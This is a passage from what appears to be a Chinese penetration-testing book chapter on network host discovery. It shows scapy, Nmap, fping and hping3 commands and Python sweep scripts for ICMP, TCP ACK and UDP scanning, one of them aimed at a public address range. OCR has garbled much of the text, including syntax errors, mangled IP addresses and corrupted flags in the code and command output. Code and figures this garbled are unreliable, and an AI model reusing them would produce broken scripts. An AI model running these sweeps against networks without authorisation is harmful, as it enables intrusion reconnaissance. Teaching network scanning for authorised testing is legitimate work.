在 三 层 扫 描 中 ， 可 以 使 用 scapy、 


La 


PE 
PE 
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Namp、fping、hping 等 工具 来 扫描 当前 网 络 
存活 的 主机 。 


1. scapy 工 具 


使 用 scapy 工 具 的 操作 步骤 如 下 : 
step 加 使 用 scapy 工 具 构 建 Ping 包 ， 定 义 
变量 i 并 赋值 为 IPO)， 定 义 变量 p 并 赋值 为 
ICMPO， 再 定义 Ping 变 量 ， 将 IP 包 与 ICMP 
包 组 合 赋值 给 Ping， 执 行 效果 如 下 图 所 示 。 


PE>> 1=IPT] 
> p=ICMP() 


>> ping=(i/p) 

>> ping.display!) 

由 ##[ IP ]### 办 碍 大 [TCMP ]## 龙 
version= 4 type= echo-request 
ihl= None code= 0 

tos= OxO chksum= None 
len= None id= 9x9 

id= 1 seq= @xO 
flags= 

frag= 0 

ttl= 64 

proto= icmp 

chksun= None 

Src= 127.0.0,.1 

dst= 127.0.0.1 

\options\ 


发 送 Ping 包 检查 返回 数据 信息 ， 给 IP 
包 赋 值 为 目标 地 址 ， 使 用 Sr10 方 法 发 送 数据 
包 ， 并 查看 返回 数据 包 的 信息 ， 执 行 效果 
如 下 图 所 示 。 


>>> ping[IP].dst = "192.168.1.1" 

>>> a = Srl(ping) 

Begin emission: 

.Finished sending 1 packets. 

浊 

Received 2 packets, got 1 answers, remaining 6 packets 
>>> a.display() 
专 ##[ IP ] 其 # 涯 
version= 4 


开 六 #[ ”ICMP  ] 天 #### 
type= echo-reply 


ihl= 5 code= 0 

tos= Q@x0O chksum= Oxffff 

len= 28 id= Dx 

1d= 52119 seq= QOx#%0 

flags= ###[ Padding ] 愉 ## 

frag= 0 Load= '\xDE\xO0\xO0\xO0\xO0\xO0\xO0\x00\xO0\ 
tt1l= 64 XOOA\XOO\ XOO\V XDANVXDOANV XOAO\ XGA xAO\ XB 


proto= icmp 
chksum= QOx2b93 
src= 192.168.1.1 
dst= 192.168.1,101 
\options\ 


[step 图 使 用 命令 构建 Ping 包 ， 该 命令 为 : 
srl(IP(dst="192.168.1.1")/ICMP()). 
display()， 执 行 效 果 如 下 图 所 示 。 


E>> srllIP(dst="192.168.1.1"*1/ICMP()).display() 

Begin emission: 

.Finished sending 1 packets. 

+ 

Received 2 packets, got 1 answers, remaining © packets 
涛 天 #[ IP  ] # 汶 才 ####| ICMP  ] 站 站 


version= 4 type= echo-reply 

ihl= 5 code= 0 

tos= 0X9 chksun= @xffff 

len= 28 id= 0xg 

id= 52348 seg= 9xQ 

flags= #####[ Padding ]### 

frag= 9 load= '\xEO\xOO\xOD\xO0\x00\xQG\xDO\xOO0\XO00N 
ttl= 64 xOQO\ xODO\ XO0W\xO0\xOO\ xOO\ xOO\ X00\x00" 

Proto= iecnp 


chksum= 06x2aae 
src= 192.168.1.1 
dst= 192.168.1.101 
\options\ 


通过 上 面 的 命令 ， 可 以 编写 一 个 目 动 
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化 python 肢 本， 来 构建 Ping 数 据 表 ， 具 体 代 
码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import * 

if lenl(sys.argv) !=2 : 

print"Usage . 

[interfacel]" 


es 1 i 


BEiINE EXanpie ne. 
Toa Lo 1 0 
print "Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 
SYS .exit () 
address = str(sys.argv[1]) # 定 义 一 个 
变量 ， 将 参数 赋值 给 变量 
# 拆 分 出 IP 地 址 
prettr address- DLE 
Lo ee 
[了 工 > TagddresseopLlitl [2 
for addr in range (1,254): 
ip=prefix+str (addr) # 组 装 IP 地 址 
# 构 建 Ping 包 并 发 送 ， 设 置 超时 时 间 0.1ms， 不 
显示 错误 信息 


es i 


answer = Srl(IP(dst=prefixt+ 
str(addr))/ICMP(),timeout=0.1,verbose=0) 
if answer == None: 
pass 
else: 


# 将 存活 主 


print prefix+str (addr) 


机 IP 地 址 打印 出 来 


当然 也 可 以 将 IP 地 址 存放 在 一 个 文件 
中 ， 通 过 python 脚 本 读 取 文件 中 的 PP 地 址 进 
行 扫描 ， 有 共 体 代码 如 下 : 


#!/usr/bin/python 
Import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
It len(sys.argv) !=2 : 
全 下 ET 
[interfacel]" 
Drint Dramalie PILInglLl py 
和 
print “Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 
SYS .exit () 
filename = str(sys.argv[1])# 定 义 一 个 变 


量 , 将 参数 中 的 文件 名 赋值 给 变量 


file = open (filename ,'"'r') # 定 义 一 个 
变量 ,使 用 open 方 法 以 读 的 方式 打开 文件 
for addr an flee 
每 次 读 取 一 行 IP 地 址 
answer = srl(IP(dst=addr.strip())/ 
ICMP(} ,七 Imeout=0 .1, verbose=0) 


if answer == None: 


# 从 文件 中 


pass 
else: 


# 将 存活 主 


print addr.strip()} 


机 IP 地 址 打印 出 来 
2. Nmap 工 具 


在 二 层 扫 拉 时， 可 以 使 用 Nmap 工 具 进 
行 扫 描 ， 在 三 层 扫描 中 也 可 以 使 用 Nmap 工 
具 ， 但 是 地 址 却 不 同 ， 二 层 只 能 在 本 机 网 
段 进行 扫描 ， 三 层 可 以 使 用 任何 网 段 。 

使 用 Nmap 工 具 进 行 三 层 扫描 的 具体 
方法 为 : 使 用 Nmap 220.181.111.0/24 -sn 命 
令 ， 换 用 不 同 地 址 段 的 人 P 进 行 扫描 ， 它 会 发 
送 ICMP 数 据 包 ， 执 行 效果 如 下 图 所 示 。 


root@kali:~/Test/3# nmap 220.181.111.6/24 -Sn 

starting Nmap 7.79 ( https://nmap.org ) at 2018-16-25 04:31 EDT 
Nmap scan report for 229.181.111.16 

Host is up (06.063s latency). 

Nmap scan report for 229.181.111.21 

Host jis up (606.0495 latency). 

Nmap Scan report for 220.181.111.22 

Host is up (6.0725 Latency ) . 


3. fping 工 具 


fping 工 具 同 Ping 工 具 类 似 ， 但 是 它 不 
是 系统 自 带 的 ， 它 比 Ping 工 具 返 回 的 信息 量 
更 大 。 其 中 常用 参数 介绍 如 下 : 

e -g: IP 区 间 表 示 需 要 增加 -g 参 数 ， 

可 以 用 fping -g 192.168.1.0/24 这 
样 的 形式 展示 也 可 以 用 fping -g 
192.168.1.1 192.168.1.254 这 样 区 间 
展现 的 形式 。 

e -q: 安静 模式 ， 所 谓 安静 就 是 中 途 

不 输出 错误 信息 ， 直 接 在 结果 中 显 
示 ， 输 出 结构 整齐 、 高 效 。 

-C: 输入 每 个 IP 探 测 的 次 数 。 

-i: 通过 -i 参数 可 以 修改 发 包间 隔 ， 
默认 为 25ms 一 个 探测 报 文 。 

使 用 fping 工 具 进行 三 层 扫描 的 操作 步 
又 如 下 : 
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发 送 数据 包 ， 使 用 fping 192.168.1.1 -c 
3 命令 发 送 3 个 数据 包 ， 进 行 信 息 探测 ， 执 
行 效果 如 下 图 所 示 Oo 


root@kali:~/,Test/3# fping 192.168.1.1 -c 3 

192.168.1.1 : [6], 84 bytes，1.61 ms (1.01 avg, 6% loss) 
192.168.1.1 : [1], 84 bytes, 1.24 ms (1.12 avy, 6% loss) 
192.168.1.1 : [2], 84 bytes, 1.28 ms (1.15 avg, 6% loss) 


192.168.1.1 : 


扫描 一 个 网 段 ， 使 用 fping -g 
192.168.1.1 192.168.1.200 -c 1 命令 ， 可 以 扫 
描 两 个 卫 地 址 之 间 的 一 个 网 段 ， 执 行 效果 如 
下 图 所 示 。 


root@kali:~/Test/3# fping -g 192.168.1.1 192.168.1.209 -Cc 1 

192.168.1.1 : [090], 84 bytes, 1.16 ms (1.16 avg, B% loss) 

192.168.1.101 : [0], 84 bytes, 8.02 ms (6.62 avg, Af% los:s) 

ICMP Host Unreachable from 192.1658.1.191 Tor ICMP Echo séent to 192.158.1.3 
ICMP Host Unreachable from 192.168.1.181 for ICMP Echo sent to 192.1658.1.2 
ICMP Host Unreachable from 192.168.1.101 for ICMP Echo sent to 192.1686.1.6 
ICMP Host Unreachable from 192.168,.1.161 Tor ICMP Echo sent to 192.158.1,5 
ICMP Host Unreachable from 192.168.1.181 for ICMP Echo sent to 192.1568.1.4 


xmt/rcv/%loss = 3/,3/8%, min/avg/max = 1.01/1.15/1.24 


192 .168.1.1 : XmtVrcv/$Loss5 = 1/1/0%, min/avg/max = 1.16/1.1671.16 
192.168.1.2 : xMmMt/rcv/sloss = 1/0/180% 
192.168.1.3 : xmt/rcv/%loss = 1/0/180% 
192.168.].4 : xmt/rcv/sloss = 1/0/1900% 


使 用 fping -g 192.168.1.1 
192.168.1.200 -c 1 >> atxt 命 令 ， 将 存活 的 主 
机 字段 保存 到 一 个 文件 中 ， 并 通过 cat a.txt 
文本 显示 出 存活 主机 信息 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:~/Test/3# cat a.txt 
192.168.1.1 : [06], 84 bytes, 
192.168.1.101 : [0], 84 bytes, 
192.168.1.162 : [6]，84 bytes, 


fping 工 具 支 持 使 用 掩 码 的 形式 赋 
值 地 址 段 ， 使 用 fping -g 192.168.1.0/24 
-C 1 命令 ， 扫 描 地 址 段 ， 执 行 效 果 如 下 图 
所 示 。 


rootgkaLIL:~/Test/73F fping -9 192.168.1.6724 -c I 

192.168.1.1 : [8], 84 bytes，1.98 ms (1.68 avgy, 0% loss) 

192.168.1.191 : [9], 84 bytes, 090.92 ms (9.g2 avg, 9% 1055) 

192.168.1.102 : [0], 84 bytes, 141 ms (141 avg, 6% loss) 

TCMP Host Unreachable from 192.168.1.161 for ICMP Echo sent to 192.168.1.3 
ICMP Host Unreachable from 192.168.1.191 for ICMP Echo sent to 192.168.1.2 


fping 工 具 支 持 从 文件 中 读 取 IP 地 址 
进行 扫描 ， 使 用 fping -f addr 命 令 ， 扫 描 
文件 中 给 出 IP 地 址 段 ， 执 行 效 果 如 下 图 
所 示 。 


root@kali:~/Test/3# fping -f addr 
a is alive 

92.168.1.101 is alive 
ICMP Host Unreachable from 192.168.1.1901 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168,.1.101 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168.1.161 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168.1.191 for ICMP Echo sent to 192.168.1.2 
N192.168.1.2 is unreachable 
192.168.1.1908 is unreachable 


1.23 ms (1.23 avg, QO% loss) 
0.08 ms (0.08 avg, OQ% loss) 
139 ms (130 avg, 0% loss) 


4. hping 工 具 


hping 是 一 个 命令 行 下 使 用 的 TCP/IP 数 
据 包 组 装 /分 析 工 具 ， 其 命令 模式 很 像 Linux 
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下 的 Ping 命 令 ， 但 是 它 不 是 只 能 发 送 ICMP 
回应 请 求 ， 它 还 支持 TCP、UDP、ICMP 和 
RAW-IP 协 议 。 

男 外 ，hping 有 一 个 路 由 跟踪 模式 ， 能 

够 在 两 个 相互 包含 的 通道 之 间 传 送 文件 。 

因此 ， 常 被 用 于 检测 网 络 和 主机 ， 其 功能 
非常 强大 ， 可 在 多 种 操作 系统 下 运行 ， 如 
Linux、 FreeBSD、 NetBSD、OpenBSD、 

Solaris、MacOs X、Windows 等 。 

该 工具 的 主要 参数 介绍 如 下 : 

e。 -H (-HELP) : 显示 帮助 。 

e -v (-VERSION) : 版 本 信息 。 

e@ -c (--count count) : 发 送 数据 包 的 
次 数 。 关 于 countreached timeout 可 
以 在 hping2.h 里 编辑 。 

e -1 (-interval) : 包 发 送 间 隔 时 间 
(单位 是 ms) ， 默 认 时 间 是 1s。 此 
功能 在 增加 传输 率 上 很 重要 ， 在 idle/ 
spoofing 扫 摘 时 此 功能 也 会 被 用 到 。 

e -nn (-nmeric) : 数字 输出 。 象 征 性 
输出 主机 地 址 《用 处 不 大 ) 。 

e -q(-quiet) : 退出 。 什 么 都 不 会 输 
出 ， 除 了 开始 结束 时 间 。 

© -1 (--interface interface name) : 无 
非 就 是 eth0 之 类 的 参数 。 

e -v (-Vverbose) : 显示 很 多 信息 ， 
TCP 回 应 一 般 如 下 : len=46; 
1p=192.168.1.1; flags=RADF; seq=0: 
ttl=255: 1d=0: win=0: rtt=0.4ms: tos=0: 
iplen=40; seq=0; ack=1380893304: 
sum=2010; urp=0。 

e -d (-debug) : 进入 debug 模 式 ， 当 
遇 到 麻烦 时 ， 比 如 用 hping 遇 到 一 些 
不 合 习 惯 的 模式 时 ， 你 可 以 用 以 下 
模式 修改 hping, (interface detection 
data link layer access, interface 
settings, ...)。 

e -z(-BIND) : 快捷 键 的 使 用 (可 
按 个 人 喜好 设 定 ) 。 
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e -Z (-unbind) : 消除 快捷 键 。 

该 工具 的 主要 功能 如 下 : 

(1) 防火 墙 测试 。 

(2) 实用 的 端口 扫描 。 

(3) 网 络 检测 ， 可 以 用 不 同 的 协议 、 
服务 类 型 (TOS) 、IP 分 片 。 

(4) 手工 探测 MTU (最 大 传输 单元 ) 
路 径 。 

(5) 先进 的 路 由 跟 踊 ， 文 持 所 有 的 
协议 。 

(6) 远程 操作 系统 探测 。 

(7) 远程 的 运行 时 间 探 测 。 

(8) TCP/IP 堆栈 审计 。 

使 用 hping 工 具 进 行 三 层 扫描 的 方法 
为 : 使 用 hping3 192.168.1.1 --icmp -c 2 命 
令 ， 可 以 对 目标 IP 进 行 探 测 ， 并 给 出 相应 的 
信息 ， 执 行 效果 如 下 图 所 示 。 


otG@kaLI hping3 192.168.1.1 eh -C > 
PING 192. i 1 (eth@ 192.168.1.1): mp mode 
i=46 ip=192.168.1.1 ttL=64 id=54898 ic Mp_seq= 

ler Y=46 ip=192.168.1.1 ttl=64 id=54899 icmp seq= 


己 台 
wm We 
和 


--- 192.， i a M0 statistic --- 
. ES ets d, 2 I et eceived, B% packet loss 
Jnd -tr i 中 二 = 65.6/6， 时 ms 


男 外 ， 用 户 可 以 使 用 for addr in $(seq 
1 254);do hping3 192.168.1.$addr --icmp -c 1 
>> handle.txt &done 命 令 ， 对 一 个 IP 段 的 地 
址 进行 扫描 并 将 结果 保存 到 一 个 文件 中 。 
这 是 因为 该 工具 显示 出 来 的 东西 比较 多 比 
较 杂 ， 所 以 建议 保存 到 一 个 文件 当中 再 进 
行 查 看 。 


(人 多 提示: 使 用 cat handle .txt | grep len | cut -d 


""- 节 2 | cut -d "=" -f 2 命令 ， 可 以 将 文本 中 
存活 主机 的 IP 信 息 提 取出 来 。 


10.4 ”四 层 扫描 


四 层 扫 描 的 优点 是 结果 可 靠 ， 而 且 
不 会 被 防火 墙 过 滤 ， 甚 至 可 以 发 现 所 有 站 
口 都 被 过 滤 的 主机 ,缺点 是 基于 状态 过 渡 
的 防火 寺 可 能 过 滤 扫 描 ， 且 全 端口 扫描 速 


度 慢 。 四 层 扫描 是 基于 TCP、UDP 协 议 来 进 
行 的 。 


10.4.1 TCP 扫 摘 


TCP (Transmission Control Protocol， 
传输 控制 协议 ) 是 一 种 面向 连接 的 、 可 靠 
的 、 基 于 字 节 流 的 传输 层 通 信 协 议 ， 由 
IETF 的 RFC 793 定 义 ， 在 简化 的 无 线 网 络 
OSI 模 型 中 ， 它 完成 第 四 层 传输 层 所 指定 的 
功能 。 

在 因特网 协议 族 (Internet protocol 
suite) 中 ，TCP 层 是 位 于 IP 层 之 上 ， 应 用 层 
之 下 的 中 间 层 。 不 同 主机 的 应 用 层 之 间 经 
常 需 要 可 靠 的 、 像 管道 一 样 的 连接 ， 但 是 IP 
层 不 提供 这 样 的 流 机 制 ， 而 是 提供 不 可 靠 
的 包 交 换 。 

TCP 通 信和 需要 建立 3 次 握手 ，TCP 的 3 次 
握手 示意 图 如 下 。 


一 一 客户 端 


, 建立 TCB 
建立 TCB 被 动 打开 


主动 打开 


TCP 探 测 主机 的 原理 有 如 下 两 条 。 

(1) 未 经 请 求 直 接 发 送 ACK 数据 包 ， 
通常 情况 下 主机 会 回复 RST 数据 包 。 

(2) 正常 请 求 发 送 SYN 请 求 数据 包 ， 
如 果 端 口 开 放 会 回复 SYN/ACK 数据 包 ， 如 
果 端 口 没 有 开放 回复 RST 数据 包 。 

使 用 scapy 工 具 进 行 TCP 扫 摘 的 操作 步 
又 如 下 : 
step 回 通过 scapy 构 建 TCP 数 据 包 ， 使 用 
i=IPO: i.dst="192.168.1.1":; idispalyO 命 令 ， 
执行 效果 如 下 图 所 示 ， 可 以 看 到 修改 了 了 了 了 字 
上 段 的 目的 PP 地址 。 


第 10 章 ”从 无 线 网 络 渗透 内 网 


b>> i=IP() 

P>> i.dst="192.158.1.1" 
p>> i.display!) 

深 并 #[ IP ]#### 


ihl= None 
tos= Ox0 
len= None 
id= 1 
flags= 
trag= 日 
ttl= 64 
proto= hopopt 
hksum= None 
= 192.1658.1.1081 
dst= 192.168.1.1 
\options\ 


通过 t=TCP(); t.flags='A'; t.display() 
命令 ， 可 以 修改 TCP 数 据 包 的 发 送 类 型 为 
ACK 数 据 包 ， 执 行 效果 如 下 图 所 示 。 

>>> t=TCP() 

>>> t.flags="'A' 
>>> 七 .dispLay() 


嵌 ## 大 [ TCP ]### 
sport= ftp data 


dport= http 
seq= 0 
ack= 0 


dataofs= None 
reserved= 0 
flags= A 
window= 8192 
chksum= None 
urgptr= 0 
options= [] 


使 用 [=(/0).display 〇 命令 ， 可 以 将 到 包 
与 TCP 包 组 合 ， 并 查看 数据 包 结 构 ， 执 行 效 
果 如 下 图 所 示 。 


p>> r=(1i/t).display() 

形 尖 六 [。 工 P ] ## 坟 ## ###[ TCP ]### 
Verslion= 4 sport= ftp data 
ihl= None dport= http 
tos= Ox0 seo= 0 
len= None ack= 0 
id= 1 dataofs= None 
tlags= reserved= 0 
frag= 9 flags= A 
ttl= 64 window= 8192 
proto= tcp chksum= None 
chksum= None urcptr= 0 
src= 192.168.1.101 options= [] 
dst= 192.168.1.1 
\OpTions\ 


使 用 命令 a=srl(r).dispaly0 命 令 ， 将 数 
据 包 发 送出 去 ， 查 看 返回 数据 包 内 容 ， 执 
行 效果 如 下 图 所 示 。 


> 1i=IPI) 


>>> .dst="192.168.1.1" 

>>> t=TCP() 

>>> t.flags='A’ 

>>> r=(i/t) 

>>> a=sr1l(r).dispaly!() 

Begin emission: 

.Finished sending 1 packets. 
* 


Received 2 packets, got 1 answers, remaining © packets 


#[ IP ]##f## 大 齐 #[ TCP ] 浊 大 检 
version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= DBX seg= 0 

Len= 48 ack= 0 

id= 56417 dataofs= 

flags= re ved= 日 
frag= © flags= 

ttl= 64 Window= 日 
proto= tcp chksum= @x2bc6 
chksum= Ox1ab8 urgptr= 日 

src= 192.168.1.1 options= [] 
dst= 192.168.1.101 ###[ Padding ]### 
\options\ load= '\xQ8\xQO\x%O\x00\xO0‘\x00 
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(人 @ 注 意 : 使 用 “; ”符号 结束 语句 。 该 语 
句 为 一 条 单独 语句 ， 为 了 便于 区 分 特别 加 入 
加 了 分 号 《在 代码 中 是 没有 分 号 的 ) 。 


step 四 使 用 一 条 命令 可 以 完成 TCP 打 描 ， 


et 0 该 命令 为 al=srl(IP(dst="192.168.1.1")/ 


TCP(dport=80,flags='A'),timeout=0.1). 
display()， 执 行 效果 如 下 图 所 示 。 


>> al=srI(IP(dst="192.168.1.1"1/7TCP(dport=66,T1(lags= A ,timeout=6.1] .dispLlay() 
Begin emission: 
Finished sending 1 packets. 


Received 1 packets, got 1 answers, remaining B packets 
[| IP ]### 区 [ TCP ]### 

sport= http 

dport= ftp data 

= 0 


src= 192.166.1.1 
st= 192.166.1.101 #y#[ Padding ]### 
\options\ load= '\x60\x00\xO0\xOO\xBB\xO0 


下 面 编辑 一 个 python 脚 本 ， 来 实现 四 层 
TCP 自 动 扫 描 ， 具 体 代 码 如 下 : 


#!/usr/bin/python 


Import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if len(sys.argv) '=2: 
print"Usage ./TICP SCAN.py [/24 
network address]" 
print"Example 
由 
print "Example will perform a TCP 
ACK Ping Scan of the 192.168.1.0/24 


range”™ 


/TOP SCAN DY 


SYS .exit() 
address = str(sys.argv[ilil]) 
# 定 义 一 个 变量 ,将 参数 赋值 给 地 址 变量 
# 使 用 分 割 函数 分 割 出 IP 地 址 的 前 三 段 
preTix =address. Split( |) 
BM Ws ee 0 se fs le ok :NE We Sy i 
[iT -Tad9dress- SP ET 。 yiZIt 
二 
# 使 用 for 循 环 遍 历 整 个 网 段 
# 构 造 发 送 TCP 数 据 包 
response = srl(IP(dst=prefixt+str 
(addr} ) /TCP(dport=80, flags="A"}), timeout= 
O01 verbose=0 
try:  # 异 常 处 理 
if Int(response[ITCP] .flags) == 4: 
# 如 果 返 回 的 数据 包 是 Reset 的 数据 包 ， 认为 存活 


print prefixztstr (addr) 
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# 将 存活 主机 打印 输出 
:二 
pass 


10.4.2 UDP 扫 拍 


UDP (User Datagram Protocol， 用 户 数 
据 报 协议 ) 是 OSI (Open System Intercon- 
nection， 开 放 式 系统 互联 ) 参考 模型 中 一 
种 无 连接 的 传输 层 协 议 ， 提 供 面 向 事务 的 
简单 不 可 靠 信 息 传 送 服务 。 

UDP 探测 主机 的 原理 为 : 当 客 户 端 问 
目标 主机 发 送 一 个 UDP 请 求 时 ， 如 果 目 标 
主机 开放 了 此 端口 ， 不 会 做 出 任何 响应 ， 
如 果 该 主机 没有 开放 此 端口 ， 会 回复 一 个 
端口 不 可 达 信 息 。 

使 用 scapy 工 具 进 行 UDP 扫 拉 的 操作 步 
又 如 下 : 
查看 UDP 数据 包 结 构 ， 使 用 u= 
UDP(); u.display0O 命 令 ， 执 行 效 果 如 下 图 
所 示 。 


>>> I=IPI() 

>>> U=UDPI( ) 

>>> U.display!() 
天 ####[ ”UDP  ] ###### 
sport= domain 
dport= domain 
Len= None 
chksum= None 


查看 完整 UDP 数据 包 结 构 ， 使 用 I=(i/ 
u).display0 命 令 ， 执 行 效果 如 下 图 所 示 。 
p>> r=(i/u).display() 


天 冯 大 [ 工 P ] 大 ## 枯 大 大大 [UDP ] ##### 
version= 4 sport= domainl 


ihl= None dport= domain 
tos= Ox0O len= None 
len= None chksum= None 
id= 1 

flags= 

frag= 0 

ttl= 64 

proto= udp 


chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\op Lions\ 


使 用 r[IP].dst="192.168.1.1" 命 令 修改 

目标 IP 地 址 ， 使 用 r[UDP].dport=6666 命 令 
修改 目标 端口 ， 使 用 r.display() 命 令 查 看 修 
改 后 的 数据 包 ， 执 行 效果 如 下 图 所 示 。 


P>> rrIIP]JT.dsSt="192.168.1.1"™ 
p>> r[UDP] .dport=6666 

p>> r.disptay() 

岩 ## 大 [ IP ] 关 # 大 。 浊 大 关 [ UDP ] 大 #### 
version= 4 sport= donain 
ihl= None dport= 6666 
tos= DX9 len= None 
len= None chksum= None 
id= 1 

flags= 

frag= 0 

ttl= 654 

proto= udp 

chksum= None 

src= 192.166.1.101 

dst= 192.168.1.1 

\options\ 


使 用 srl(r,timeout=1).display() 命 令 发 
送 数 据 包 并 查看 返回 结果 ， 执 行 效果 如 下 
图 所 示 。 


E>> srl(r,timeout=1).displayl) 
Begin emission: 

.Finished sending 1 packets. 

+ 
Received 2 packets, got 1 answers, remaining 0 packets 
捧 并 #[ ”IP ] ##### ###¥[ IP In ICMP |]### 


version= 4 
ihl= 5 

tos= DXO 

len= 56 

id= 16] 

flags= 

frag= 0 

ttl= 128 
proto—- icmp 
chksum= Oxb607 


version= 4 
ihl= 5 

tos= OxO 

len= 28 

id= 1 

flags= 

frag= 9 

ttl= 64 

Proto=- udp 
chksum= 0xf6b3 


第 10 章 ”从 无 线 网 络 渗透 内 网 -500 


下 面 编辑 一 个 python 脚 本 实现 四 层 UDP 
自动 扫描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) '=2: 
print"Usage /UDP SCAN-DY 1/24 
network address]" 
pilint Exanple 
正品 下 二 生生 站 二 和 二 
print “EXample will perform a TCP 
ACK Ping scan of he 192.168.1.0/24 
range”™ 
SySs.exit () 


UDP I SCAN DY 


address = str(sys.argv[1]) 

prefix = address-. split("  .") 
PO 2 
[Ll .Taddress- -5pliaet ylale 

for addr in range(1,254) : 


src= 192.168.1.103 
dst= 192.168.1.101 
\options\ 

所 ##[ ICMP ]### 

type= dest-unreach 


src= 192.168.1.101 
dst= 192.165.1.103 
\options\ 
###[ UDP In ICMP ]### 
sport= domain 


code= port-unreachabl, dport= 6666 
chksum= Ox8133 len= 8 
reserved= 0 chksum= Dx6182 
length= 9 


nexthopmtu= 0 


人 @ 提 示 : 如 果 目 标 主机 没有 开放 相应 的 端 
口 ， 会 返回 一 个 目标 不 可 达 消 息 ， 但 是 也 
有 个 别 设 备 不 会 响应 这 类 数据 包 ， 为 了 避 
免 一 直 等 待 ， 可 以 加 入 超时 检测 指令 。 


使 用 一 条 命令 可 以 完成 UDP 扫 
描 ， 该 命令 为 Sr1(P(dst="192.168.1.103"/ 
UDP(dport=6666)).display()， 执 行 效果 如 下 
图 所 示 。 


E>> SrI(IP(dst="192.168.1.193"]J/UDP(dpoOrt=6666)).disptlay(] 
Begin emission: 

.Finished sending 1 packets. 
* 


Received 2 packets, got 1 answers, remaining 90 packets 
类 ##[ IP ]### ###[ IP in ICMP ]### 
version= 4 version= 4 


ihl= 5 ihl= 5 

tos= Ox0 tos= Ox0 

len= 56 len= 28 

id= 163 id= 1] 

flags= flags= 

frag= 0 frag= 0 

ttl= 128 ttl= 64 

proto= icmp prOLO= udb 

chksum= OQxb505 chksum= 9xf6b3 
src= 192.168.1.103 src= 192.168.1.101 
dst= 192.168.1.101 dst= 192.168.1.103 
\options\ \options\ 


###[ UDP In ICMP ]### 
sport= domain 


震 ###[ ICMP ]### 
type= dest-unreach 


code= port-unreachable dport= 6666 
chksum= Dx8133 len= 8 
reserved= 0 chksum= 9x6182 
Length= 0 


nexthopmtu= 0 


# 循 环 遍历 整个 IP 地 址 段 
# 构 建 UDP 数 据 包 ， 设 置 超时 时 间 ， 不 查看 错误 信息 
response = srl(IP(dst=prefix+str 
(addr) ) /UDP (dport=6666) ,timeout=0.1,verb 
ase 0 
LE 呈 | 计 
if int(response[IP] .Proto) == 1: 
#IP 的 上 层 协议 如 果 是 1 ( ICMP ) 认为 是 有 数据 返回 
print prefix+str (addr) 
# 将 存活 主机 IP 地 址 打印 出 来 
SeeDtEe: 
pass 


10.4.3 ”工具 扫 摘 


使 用 Namp、hping3 等 工具 可 以 进行 四 a 3 
层 扫描 。 


1. Nmap 工 具 


Nmap 工 具 在 四 层 扫描 的 功能 还 是 非常 
强大 的 ， 使 用 的 具体 操作 步骤 如 下 : 
使 用 Nmap 113.105.151.1-100 -PU666 
-Sn 命令 ， 可 以 实现 UDP 扫描 ， 执 行 效果 如 
下 图 所 示 。 


Foot@kali:-# nmap 192.168.1.1-106 -PU666 -sn 

starting Nmap 7.76 ( https://nmap.org ) at 2018-16-26 63:5]1 EDT 
Nmap scan report for 192.168.1.1 

Host is Up (6.090715 latency). 

MAC Address: 1C:FA:68:@1:2F:88 (Tp-Link Technologies) 

Nmap scan report for 192.168.1.100 

Host is Up (06.00018s latency). 

MAC Address: 69:25:22:F9:5F:44 (ASROCK Incorporation) 

Nmap done: 166 IP addresses (2 hosts up) scanned ln 3.95 seconds 
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使 用 Nmap 192.168.1.1-100 -PA666 -sn 
命令 ， 可 以 实现 TCP 打 描 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:~# nmap 192.168.1.1-100 -PA666 -sn 

starting Nmap 7.79 ( https://nmap.org ) at 2018-10-26 03:53 EDT 
Nmap scan report for 192.168.1.1 

Host is up (0.09084s5 Latency1 . 

MAC Address: 1LC:FA:68:601:2F:08 (Tp-link Technologies) 

Nmap scan report for 192.168.1.100 

Host is up [9.099018s Latency1 . 

MAC Address: 00:25:22:F9:5F:44 (ASRock Incorporation) 


Nmap done: 160 IP addresses |2 hosts up) scanned in 2.35 seconds 


在 扫描 上 ，Nmap 不 局 限于 -PU 与 -PA 
两 个 参数 ， 还 有 其 他 参数 。 具 体 的 参数 信 
息 如 下 图 所 示 。 


HOST DISCOVERY: 

-SL: List Scan - simply List targets to scan 

-sn: Ping Scan - disable port scan 

-Pn: Treat all hosts as online -- skip host discovery 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocoL list]: IP Protocol Ping 

-Nn/-R: Never do DNS resolution/Always resolve [default: sometimes] 
--dns-servers <serv]l[,serv2],...>: Specify custom DNS servers 
--System-dns: Use 0S's DNS resolver 

--traceroute: Trace hop path to each host 


全 提示 : 当然 也 可 以 采用 地 址 列表 导入 
的 形式 进行 四 层 打 描 ， 该 命令 为 Nmap -iL 
addr.txt -PA80 -Sn。 


2. hping3 工 具 


使 用 hping3 工 具 可 以 进行 四 层 扫描 ， 具 
体操 作 步 又 如 下 : 
使 用 hping3 192.168.1.103 --udp -c 1 命 
令 ， 可 以 对 该 地 址 实现 基于 UDP 的 扫描 ， 
执行 效果 如 下 图 所 示 。 


root@kali:-# hping3 192.168.1.103 --udp -c 1 

HPING 192.168.1.103 (eth@ 192.168.1.193): udp mode set, 28 headers + 0 data bytes 
ICMP Port Unreachable from ip=192.168.1.163 name=UNKNOWN 

status=Q port=1586 seq=9 


-- 192.168.1.193 hping statistic --- 
1 packets transmitted, 1 packets receijved, B85 packet loss 
round-trip min/avg/max = 29.7/29.7/29.7 ms 


下 面 给 出 一 段 基 于 UDP 的 shell 脚 本 ， 
使 用 该 脚本 可 以 自动 进行 UDP 扫 描 ， 具 体 
代码 如 下 : 


